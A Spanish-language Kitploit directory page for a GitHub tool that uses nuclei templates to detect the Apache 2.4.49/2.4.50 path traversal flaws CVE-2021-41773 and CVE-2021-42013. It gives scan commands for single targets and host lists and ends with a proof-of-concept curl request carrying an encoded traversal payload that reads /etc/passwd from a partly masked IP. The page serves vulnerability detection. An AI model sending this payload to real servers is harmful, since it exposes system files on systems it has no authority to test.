Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
apache-vulnerable — Detecta vulnerabilidades de path traversal en Apache HTTP Server (CVE-2021-41773, CVE-2021-42013) comprobando la exposición de /etc/passwd mediante diversas técnicas de traversal. | Kitploit
Herramientas/GitHubGitHub/psibot/apache-vulnerable
Escáneres de VulnerabilidadesEscáneres de Vulnerabilidades WebAnálisis de VulnerabilidadesExplotaciónSeguridad WebPruebas de Penetración
GitHubpsibot/apache-vulnerable

apache-vulnerable

Detecta vulnerabilidades de path traversal en Apache HTTP Server (CVE-2021-41773, CVE-2021-42013) comprobando la exposición de /etc/passwd mediante diversas técnicas de traversal.

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Escanea versiones de Apache "ZERO-DAY"

Apache Version 2.4.49 and 2.4.50

(CVE-2021-41773) and (CVE-2021-42013)

Cómo usar :

¡Necesitarás nuclei!

https://github.com/projectdiscovery/nuclei

Comprueba la instalación local de nuclei y verifica la plantilla

nuclei -t apache-vulnerable-versions.yaml -vv

y

nuclei -t apache-path-traversal-rce-v2.yaml -vv

Deberías ver

[apache-vulnerable-versions] Vulnerable Apache Versions (2.4.49-2.4.50) (@psibot) [high]

y

[apache-path-traversal-passwd] Apache Path Traversal - /etc/passwd Exposure (@psibot) [critical]

Para escanear un objetivo :

nuclei --silent -t apache-vulnerable-versions.yaml -u https://*.*.*.*:port

Para escanear objetivos en un archivo :

nuclei --silent -t apache-vulnerable-versions.yaml -l hosts.txt

Información sobre las plantillas de Nuclei

apache-vulnerable-versions.yaml - Detecta la versión de Apache y mostrará HIGH si es vulnerable.

apache-vulnerable-versions.yaml

apache-path-traversal-rce-v2.yaml - Ejecutará un exploit y mostrará la ruta vulnerable. Mostrará CRITICAL si es vulnerable.

apache-path-traversal-rce-v2.yaml

POC :

curl -s -k https://135.*.120.*:8443/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

POC

Descargar herramienta